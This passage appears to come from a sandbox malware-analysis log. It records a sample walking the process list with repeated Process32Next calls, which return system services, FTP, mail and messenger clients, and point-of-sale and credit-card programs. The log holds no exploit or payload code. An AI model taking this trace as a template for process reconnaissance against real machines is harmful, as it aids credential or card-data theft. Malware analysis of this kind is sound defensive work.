th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.557] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.563] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.565] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.567] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.569] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.570] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.571] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0244.575] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0244.577] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0244.578] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.579] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0244.581] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0244.582] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0244.583] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0244.585] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0244.586] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0244.587] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0244.592] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0244.594] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0244.595] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0244.596] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0244.598] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0244.599] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0244.600] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0244.602] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0244.603] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0244.651] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0244.652] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0244.654] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0244.655] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0244.656] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0244.658] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0244.659] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0244.661] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0244.662] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0244.663] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0244.665] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0244.666] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0244.670] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0244.672] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0244.673] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0244.674] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0244.676] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0244.677] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0244.678] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0244.680] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0244.682] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0244.686] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0244.688] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0244.689] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0244.691] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0244.692] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0244.694] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0244.696] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0244.697] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0244.747] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0244.750] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0244.752] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0244.754] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0244.755] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0244.757] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0244.759] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0244.761] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0244.764] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0244.766] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0244.768] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0244.770] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0244.772] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0244.774] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0244.777] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0244.779] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0244.781] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0244.783] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0244.785] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0244.788] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0244.790] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0244.825] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0244.827] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0244.829] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0244.830] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0244.832] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0244.834] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0244.835] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0244.837] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: 